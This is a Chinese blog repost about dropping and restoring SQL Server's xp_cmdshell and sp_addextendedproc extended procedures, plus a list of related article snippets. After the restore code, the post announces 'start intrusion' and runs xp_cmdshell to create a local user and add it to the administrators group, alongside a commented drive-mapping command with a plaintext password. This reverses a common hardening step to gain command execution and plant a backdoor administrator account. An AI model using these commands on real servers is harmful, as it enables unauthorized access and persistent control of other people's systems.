SQL的xp_cmdshell和sp_addextendedproc删除与恢复

最新推荐文章于 2023-12-12 17:34:46 发布
最新推荐文章于 2023-12-12 17:34:46 发布
阅读量120 收藏
点赞数
原文链接:http://www.cnblogs.com/ghostljj/archive/2007/09/20/900047.html
版权


--查询此过程的dll
sp_helpextendedproc xp_cmdshell


删除相关控制台命令
--删除xp_cmdshell控制台
EXEC sp_dropextendedproc 'xp_cmdshell'
--删除sp_addextendedproc附加函数
DROP PROCEDURE sp_addextendedproc


附加回相关控制台命令
--恢复sp_addextendedproc附加函数
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
--恢复xp_cmdshell控制台
EXEC sp_addextendedproc 'xp_cmdshell' ,'xplog70.dll' 
--dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 备用恢复xp_cmdshell控制台,这样可以直接恢复,不用去管sp_addextendedproc是不是存在



准备工作做好后,开始入侵

exec master..xp_cmdshell
--'net use z: \\192.168.2.206\F$ "barefoot321+-*" /user:192.168.2.206\barefootadmin'  --添加一个影射
'net user xiao xiao /add & net localgroup administrators xiao /add' --添加一个高级管理员用户

转载于:https://www.cnblogs.com/ghostljj/archive/2007/09/20/900047.html

weixin_30858241
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLServer中调用外部扩展存储过程
博客人生——过生活、谈技术
02-29 1万+
 1、扩展存储过程的引入首先,我们需要知道在SQLServer(7.0以上版本)中有一个扩展存储过程,名叫sp_addextendedproc,这是干什么用的呢,查它的帮助呀,不就知道了J,在SQLServer的帮助中是这样描述的:向 Microsoft SQL Server 注册新扩展存储过程的名称。语法为:sp_addextendedproc [@functname=] pr
mysql xpcmdshell_SQL入侵恢复xp_cmdshell方法总结
weixin_36256447的博客
01-19 618
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用1433 SQL入侵恢复xp_cmdshell方法总结sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configur...
存储过程sp_addextendedproc破坏处理
03-12
恢复sp_addextendedproc存储过程
sp_addextendedproc
diedangxiang4092的博客
05-12 127
2008年5月12日志: sp_addextendedproc --------------------------- Microsoft SQL-DMO (ODBC SQLState: 42000) --------------------------- 错误 0: Cannot find the function xp_dirtree in the libra...
提示错误未能找到存储过程master.dbo.sp_addextendedproc
huike008的博客
01-24 86
打开查询分析品,输入下面的代码: (注: 打开 开始——-程序—–Microsoft SQL Server—-查询分析器—–输入用户户和密码,确定) use master go create procedure sp_addextendedproc @functname nvarchar(517), @dllname varchar(255) as set implicit_tr...
sp_dropextendedproc
gz775的专栏
04-17 1308
DROP   PROCEDURE   sp_makeWEBtask   <br />  exec   master..sp_dropextendedproc   xp_cmdshell   <br />  exec   master..sp_dropextendedproc   xp_dirtree   <br />  exec   master..sp_dropextendedproc   xp_fileexist   <br />  exec   master..sp_dropextendedproc 
mysql xpcmdshell_MSSQL入侵恢复xp_cmdshell方法总结
weixin_39888180的博客
01-19 624
MSSQL弱口令入侵已经很罕见了,但在内网时有时还能用到,今天在搞机器的时候遇上一MSSQL2005,第一次见这错误信息,搜索到答案,贴在BLOG上以后遇上备用.-----------------------------------------------------------------------------------------------------------错误信息:SQL Ser...
MSSQL利用xp_cmdshell 写Debug Log程序
sen_shan的专栏
12-12 703
在写存储过程时,调试程序经常用PRINT或Table记录log,Table在事务提交在相对复杂,PRINT在查询分析器中有效,后端程序调用无法看到效果,针对此问题想到利用xp_cmdshell写Debug Log
xp_cmdshell开启与关闭
09-11
Exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll' Go ``` 这将恢复xp_cmdshell扩展存储过程,允许管理员继续使用xp_cmdshell。 需要注意的是,xp_cmdshell的使用需要非常小心,因为它可以执行任何操作系统...
sql2005开启xp_cmdshell
09-11
SQL Server 2005中的`xp_cmdshell`是一个存储过程,它允许执行操作系统命令并在SQL Server环境中返回结果。这个功能对于系统管理员来说非常有用,因为它可以用来进行一些自动化任务,比如文件操作、系统管理或者集成...
SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask
12-14
开启和关毕xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;...
SQLserver 数据库危险存储过程删除恢复方法
09-11
总结来说,删除恢复SQL Server中的危险存储过程是一种权衡安全与功能的策略。在执行这些操作前,务必评估其对系统的影响,并确保有适当的安全措施来保护数据库。同时,定期审计和监控数据库活动也是确保系统安全的...
未能找到存储过程 master.dbo.sp_addextendedproc 解决办法
woolnil的专栏
07-21 4514
(注: 打开 开始-------程序-----Microsoft SQL Server----查询分析器-----输入用户户和密码,确定)use mastergocreate procedure sp_addextendedproc@functname nvarchar(
sqlserver sp_OACreate使用例子
德州仪器
07-11 6751
T-SQL 中是可以调用 OLE 的,将这一功能应用到触发器、存储过程等对象中,SQL Server 运用变得更贴近我们的功能,更加满足我们的需要。
sql server 2005下开启xp_cmdshell的办法
weixin_33738982的博客
04-12 191
sql server 2005下开启xp_cmdshell的办法 2009年05月09日 星期六 下午 06:06 sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell...
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除
《大学生职业生涯规划与就业指导》大一阶段课程作业
最新发布
07-24
《大学生职业生涯规划与就业指导》大一阶段课程作业
1433端口提权实战教程:恢复xplog70.dll解决常见错误
恢复过程中,作者首先通过`exec sp_dropextendedproc 'xp_cmdshell'`指令删除了原有的xp_cmdshell存储过程,然后使用`dbcc addextendedproc`指令将新路径下的xplog70.dll文件加载回来,以重新激活xp_cmdshell功能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值